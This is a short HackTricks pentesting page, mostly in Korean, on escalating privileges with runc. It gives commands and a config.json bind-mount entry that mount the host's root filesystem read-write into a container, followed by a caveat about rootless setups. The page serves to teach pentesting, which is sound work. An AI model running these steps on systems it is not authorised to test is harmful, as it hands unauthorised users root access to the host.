RunC Privilege Escalation

HackTricks 지원하기

기본 정보

runc에 대해 더 알고 싶다면 다음 페이지를 확인하세요:

2375, 2376 Pentesting Docker

PE

호스트에 runc가 설치되어 있다면 호스트의 루트 / 폴더를 마운트하여 컨테이너를 실행할 수 있을지도 모릅니다.

runc -help #Get help and see if runc is intalled
runc spec #This will create the config.json file in your current folder

Inside the "mounts" section of the create config.json add the following lines:
{
"type": "bind",
"source": "/",
"destination": "/",
"options": [
"rbind",
"rw",
"rprivate"
]
},

#Once you have modified the config.json file, create the folder rootfs in the same directory
mkdir rootfs

# Finally, start the container
# The root folder is the one from the host
runc run demo

이것은 항상 작동하지 않을 수 있습니다. runc의 기본 동작은 root로 실행하는 것이기 때문에 비특권 사용자로 실행하는 것은 단순히 작동할 수 없습니다(루트리스 구성 없이는). 루트리스 구성을 기본값으로 만드는 것은 일반적으로 좋은 생각이 아닙니다. 루트리스 컨테이너 내부에는 루트리스 컨테이너 외부에는 적용되지 않는 몇 가지 제한이 있기 때문입니다.

HackTricks 지원하기

Last updated